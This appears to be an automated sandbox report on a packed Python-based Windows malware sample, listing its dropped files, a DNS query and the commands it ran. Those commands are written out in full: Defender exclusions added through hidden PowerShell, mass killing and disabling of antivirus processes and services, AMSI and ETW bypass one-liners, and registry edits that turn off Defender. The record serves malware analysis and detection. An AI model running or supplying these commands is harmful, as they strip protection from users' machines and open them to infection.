Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '<Full path to file>'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess '<File name>.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%APPDATA%'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.dll'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.scr'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%HOMEPATH%'"
- '<SYSTEM32>\taskkill.exe' /F /IM MpCmdRun.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM NisSrv.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SgrmBroker.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SenseCncProxy.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM MsMpEng.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SenseSampleUploader.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM smartscreen.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SecurityHealthService.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM MpDlpService.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SenseIR.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM avgwdsvc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM ccSvcHst.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mfemms.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM avgidsagent.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM vsserv.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM ksdeui.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM bdredline.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AvastEmUpdate.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SophosUI.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM kavtray.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM avpui.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM ksde.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM aswToolsSvc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mbamtray.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM NortonSecurity.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM MBAMWsc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM swi_service.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mfefire.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mfevtp.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM bdwtxag.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM updatesrv.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AVGSvc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mbamservice.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM avgui.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM klnagent.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM eguiProxy.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SophosHealth.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM Norton_WSC.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM ModuleCoreService.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM klwtblfs.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SecurityHealthSystray.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM mfewc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM aswidsagent.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM TmListen.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM avp.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM PccNTMon.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM bdagent.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AvastUI.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM McAPExe.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM bdservicehost.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM nsWscSvc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM PSUAService.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM egui.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AvastSvc.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM SAVService.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM cmdagent.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM ekrn.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM a2guard.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM a2service.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM fsguiexe.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AVK.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM zlclient.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM PSANHost.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM WRSkyClient.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AVKWCtl.exe /T
- %TEMP%\_mei14002\crypto\cipher\_arc4.pyd
- %TEMP%\_mei14002\crypto\cipher\_salsa20.pyd
- %TEMP%\_mei14002\crypto\cipher\_chacha20.pyd
- %TEMP%\_mei14002\crypto\cipher\_pkcs1_decode.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_aes.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_aesni.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_arc2.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_blowfish.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_cast.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_cbc.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_cfb.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_ctr.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_des.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_des3.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_ecb.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_eksblowfish.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_ocb.pyd
- %TEMP%\_mei14002\crypto\cipher\_raw_ofb.pyd
- %TEMP%\_mei14002\crypto\hash\_blake2b.pyd
- %TEMP%\_mei14002\crypto\hash\_blake2s.pyd
- %TEMP%\_mei14002\crypto\hash\_md2.pyd
- %TEMP%\_mei14002\crypto\hash\_md4.pyd
- %TEMP%\_mei14002\crypto\hash\_md5.pyd
- %TEMP%\_mei14002\crypto\hash\_ripemd160.pyd
- %TEMP%\_mei14002\crypto\hash\_sha1.pyd
- %TEMP%\_mei14002\crypto\hash\_sha224.pyd
- %TEMP%\_mei14002\crypto\hash\_sha256.pyd
- %TEMP%\_mei14002\crypto\hash\_sha384.pyd
- %TEMP%\_mei14002\crypto\hash\_sha512.pyd
- %TEMP%\_mei14002\crypto\hash\_ghash_clmul.pyd
- %TEMP%\_mei14002\crypto\hash\_ghash_portable.pyd
- %TEMP%\_mei14002\crypto\hash\_keccak.pyd
- %TEMP%\_mei14002\crypto\hash\_poly1305.pyd
- %TEMP%\_mei14002\crypto\math\_modexp.pyd
- %TEMP%\_mei14002\crypto\protocol\_scrypt.pyd
- %TEMP%\_mei14002\crypto\publickey\_curve25519.pyd
- %TEMP%\_mei14002\crypto\publickey\_curve448.pyd
- %TEMP%\_mei14002\crypto\publickey\_ec_ws.pyd
- %TEMP%\_mei14002\crypto\publickey\_ed25519.pyd
- %TEMP%\_mei14002\crypto\publickey\_ed448.pyd
- %TEMP%\_mei14002\crypto\util\_cpuid_c.pyd
- %TEMP%\_mei14002\crypto\util\_strxor.pyd
- %TEMP%\_mei14002\vcruntime140.dll
- %TEMP%\_mei14002\vcruntime140_1.dll
- %TEMP%\_mei14002\_asyncio.pyd
- %TEMP%\_mei14002\_bz2.pyd
- %TEMP%\_mei14002\_ctypes.pyd
- %TEMP%\_mei14002\_decimal.pyd
- %TEMP%\_mei14002\_hashlib.pyd
- %TEMP%\_mei14002\_lzma.pyd
- %TEMP%\_mei14002\_multiprocessing.pyd
- %TEMP%\_mei14002\_overlapped.pyd
- %TEMP%\_mei14002\_queue.pyd
- %TEMP%\_mei14002\_socket.pyd
- %TEMP%\_mei14002\_sqlite3.pyd
- %TEMP%\_mei14002\_ssl.pyd
- %TEMP%\_mei14002\_wmi.pyd
- %TEMP%\_mei14002\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei14002\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei14002\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei14002\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei14002\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei14002\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei14002\base_library.zip
- %TEMP%\_mei14002\libcrypto-3.dll
- %TEMP%\_mei14002\libffi-8.dll
- %TEMP%\_mei14002\libssl-3.dll
- %TEMP%\_mei14002\pyexpat.pyd
- %TEMP%\_mei14002\python313.dll
- %TEMP%\_mei14002\rar.exe
- %TEMP%\_mei14002\rarreg.key
- %TEMP%\_mei14002\select.pyd
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei14002\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei14002\sonic.aes
- %TEMP%\_mei14002\sqlite3.dll
- %TEMP%\_mei14002\ucrtbase.dll
- %TEMP%\_mei14002\unicodedata.pyd
- nul
- DNS ASK gs##tic.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '<Full path to file>'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess '<File name>.exe'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%TEMP%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%APPDATA%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.exe'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.dll'""
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.scr'""
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MsMpEng.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpCmdRun.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NisSrv.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthService.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthSystray.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM smartscreen.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpDlpService.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SgrmBroker.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseIR.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseCncProxy.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseSampleUploader.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastSvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastUI.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswidsagent.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswToolsSvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastEmUpdate.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVGSvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgui.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgidsagent.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgwdsvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avp.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avpui.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM kavtray.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klnagent.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klwtblfs.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksde.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksdeui.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdagent.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdservicehost.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdredline.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdwtxag.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsserv.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM updatesrv.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NortonSecurity.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM nsWscSvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM Norton_WSC.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ccSvcHst.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM McAPExe.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfemms.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfevtp.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfefire.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfewc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ModuleCoreService.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamservice.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamtray.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MBAMWsc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ekrn.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM egui.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM eguiProxy.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosHealth.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosUI.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SAVService.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM swi_service.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PccNTMon.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMSRV.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMServer.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmListen.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmProxy.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cmdagent.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cfp.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cis.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSA.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSkyClient.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSANHost.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSKMAD.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSUAService.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fshoster32.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fsguiexe.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fssm32.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVK.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKWCtl.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKProxy.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2service.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2guard.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM zlclient.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsmon.exe /T"
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM wscsvc.exe /T"
- '<SYSTEM32>\cmd.exe' /c "sc stop "WinDefend""
- '<SYSTEM32>\cmd.exe' /c "sc config "WinDefend" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "WdNisSvc""
- '<SYSTEM32>\cmd.exe' /c "sc config "WdNisSvc" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "Sense""
- '<SYSTEM32>\cmd.exe' /c "sc config "Sense" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "wscsvc""
- '<SYSTEM32>\cmd.exe' /c "sc config "wscsvc" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "SecurityHealthService""
- '<SYSTEM32>\cmd.exe' /c "sc config "SecurityHealthService" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "avast! Antivirus""
- '<SYSTEM32>\cmd.exe' /c "sc config "avast! Antivirus" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "aswbIDSAgent""
- '<SYSTEM32>\cmd.exe' /c "sc config "aswbIDSAgent" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "AvastWscReporter""
- '<SYSTEM32>\cmd.exe' /c "sc config "AvastWscReporter" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVG Antivirus""
- '<SYSTEM32>\cmd.exe' /c "sc config "AVG Antivirus" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "avgfws""
- '<SYSTEM32>\cmd.exe' /c "sc config "avgfws" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "avgwd""
- '<SYSTEM32>\cmd.exe' /c "sc config "AVP18.0.0" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVP18.0.0""
- '<SYSTEM32>\cmd.exe' /c "sc config "avgwd" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "klim6""
- '<SYSTEM32>\cmd.exe' /c "sc config "klim6" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "KLIF""
- '<SYSTEM32>\cmd.exe' /c "sc config "KLIF" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "bdredline""
- '<SYSTEM32>\cmd.exe' /c "sc config "bdredline" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "VSSERV""
- '<SYSTEM32>\cmd.exe' /c "sc config "VSSERV" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "bdagent""
- '<SYSTEM32>\cmd.exe' /c "sc config "bdagent" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "Norton Security""
- '<SYSTEM32>\cmd.exe' /c "sc config "Norton Security" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "NS""
- '<SYSTEM32>\cmd.exe' /c "sc config "NS" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "McAfee McShield""
- '<SYSTEM32>\cmd.exe' /c "sc config "McAfee McShield" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "mfevtp""
- '<SYSTEM32>\cmd.exe' /c "sc config "mfevtp" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "mfefire""
- '<SYSTEM32>\cmd.exe' /c "sc config "mfefire" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "MBAMService""
- '<SYSTEM32>\cmd.exe' /c "sc config "MBAMService" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "mbamwsc""
- '<SYSTEM32>\cmd.exe' /c "sc config "mbamwsc" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "ekrn""
- '<SYSTEM32>\cmd.exe' /c "sc config "ekrn" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "epfw""
- '<SYSTEM32>\cmd.exe' /c "sc config "epfw" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "epfwwfp""
- '<SYSTEM32>\cmd.exe' /c "sc config "epfwwfp" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "Sophos Agent""
- '<SYSTEM32>\cmd.exe' /c "sc config "Sophos Agent" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "SAVService""
- '<SYSTEM32>\cmd.exe' /c "sc config "SAVService" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "swi_service""
- '<SYSTEM32>\cmd.exe' /c "sc config "swi_service" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "TMBMServer""
- '<SYSTEM32>\cmd.exe' /c "sc config "TMBMServer" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "TmListen""
- '<SYSTEM32>\cmd.exe' /c "sc config "TmListen" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "TmProxy""
- '<SYSTEM32>\cmd.exe' /c "sc config "TmProxy" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "CmdAgent""
- '<SYSTEM32>\cmd.exe' /c "sc config "CmdAgent" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "cmdvirth""
- '<SYSTEM32>\cmd.exe' /c "sc config "cmdvirth" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "WRSA""
- '<SYSTEM32>\cmd.exe' /c "sc config "WRSA" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "WRCoreService""
- '<SYSTEM32>\cmd.exe' /c "sc config "WRCoreService" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "PandaAetherAgent""
- '<SYSTEM32>\cmd.exe' /c "sc config "PandaAetherAgent" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "PSUAService""
- '<SYSTEM32>\cmd.exe' /c "sc config "PSUAService" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "F-Secure Gatekeeper Handler Starter""
- '<SYSTEM32>\cmd.exe' /c "sc config "F-Secure Gatekeeper Handler Starter" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "FSMA""
- '<SYSTEM32>\cmd.exe' /c "sc config "FSMA" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "FSDFWD""
- '<SYSTEM32>\cmd.exe' /c "sc config "FSDFWD" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVKWCtl""
- '<SYSTEM32>\cmd.exe' /c "sc config "AVKWCtl" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "AVKProxy""
- '<SYSTEM32>\cmd.exe' /c "sc config "AVKProxy" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "a2AntiMalware""
- '<SYSTEM32>\cmd.exe' /c "sc config "a2AntiMalware" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "a2service""
- '<SYSTEM32>\cmd.exe' /c "sc config "a2service" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "vsmon""
- '<SYSTEM32>\cmd.exe' /c "sc config "vsmon" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "sc stop "zlclient""
- '<SYSTEM32>\cmd.exe' /c "sc config "zlclient" start= disabled"
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($nul...
- '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_e...
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
- '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
